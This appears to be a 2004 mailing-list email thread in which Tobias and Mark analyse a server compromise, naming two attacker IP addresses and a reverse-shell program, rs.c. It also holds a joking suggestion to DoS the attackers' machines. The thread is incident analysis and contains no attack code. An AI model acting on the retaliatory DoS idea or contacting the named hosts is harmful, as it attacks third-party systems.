Hello Mark, Am Die, den 13.01.2004 schrieb Retallack, Mark (Siemens) um 17:27:
As far has I can tell there are 2 IP address that we have:
218.234.171.84 - From where the files are downloaded 163.17.51.8 - Where the application connects to when it is run on the compromised machine.
Ah. I didn't notice there are two machines involved here. Is there a way to find out who is running those machines and send along a message to shut down one of them so that this scriptkiddy has to look for another victim?
If you assume that the rs.c source file is contains the code for the rhs/.do application then 163.17.51.8 will be the address that the application connects to on the internet and opens a shell for the remote hacker to use.
From looking at the code, it is not a worm/virus type of application, it requires a human to infect the destination computer.
Which requires another remote exploit. So when I don't run dynamic content on my webserver and the yast online update installs the latest fixes automated every night, the risk should be marginal, right?
I think that 218.234.171.84 is just a storage location for the files. If this is correct then both machines are the origin, however the 163.17.51.8 computer is the more important one because it is the one that the hacker would use to communicate to the compromised machine (directly or via a proxy of some sort).
[fun]I'm bored. Let's DOS that machine list! :-)[/fun] Seriously. When such a "hack" can be traced back by simply looking into network traffic and source code why are folks not going after those machines or their owners?
No real reason. I just like to be paranoid, just in case the file contains JavaScript or something. Just because the file ends in .c, does not mean that it is a 'real' c file.
That's what I was wondering about... if maybe you already found some malicious content behind that URL.
I've given them a look. Has anybody ever heard of a "pokemon squadron hacking team"?!
Not me. I did notice the name in the html file. Google does not give any information ether.
The name suggests some 13 year old script kiddy though ;-) kind regards, Tobias